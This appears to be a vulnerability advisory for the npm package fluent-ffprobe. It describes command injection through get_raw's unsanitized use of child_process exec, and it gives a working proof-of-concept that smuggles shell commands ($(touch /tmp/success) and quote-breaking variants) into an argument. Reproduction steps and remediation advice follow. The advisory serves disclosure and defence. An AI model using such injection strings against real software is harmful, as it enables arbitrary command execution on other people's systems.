Library for quickly accesing ffprobe. You can use @ffprobe-installer/ffprobe to get the path
Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).
If (attacker-controlled) user input is given to the get_raw,get_raw,get_raw function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.
This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].
[1] https://cwe.mitre.org/data/definitions/77.html
[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback
The proof-of-concept code below illustrates the issue. Executing this code will cause the command touch /tmp/success to be executed, leading to the creation of a file called success in the /tmp directory.
var PUT = require('fluent-ffprobe');
var x0 = " $(touch /tmp/success) # \" || touch /tmp/success # ' || touch /tmp/success";
var x1 = '.';
var x2 = ')}@';
PUT["get_raw"](x0,x1,x2)();Environment: Node.js v15.5.0 on Linux
Steps to reproduce:
npm i fluent-ffprobe@1.5.1- Create a file,
poc.js, containing the PoC code. - Execute the file:
node poc.js
A file called success will be created in the tmp directory as a result of the execution of the PoC.
- Consider using
execFile[1] orexecFileSync[2] if possible, which do not spawn a shell. - If possible, consider only passing inputs to
execthat match a predefined allow-list. - If using an allow-list is not possible, consider sanitizing inputs to
execsuch that they do not contain shell meta-characters such as$().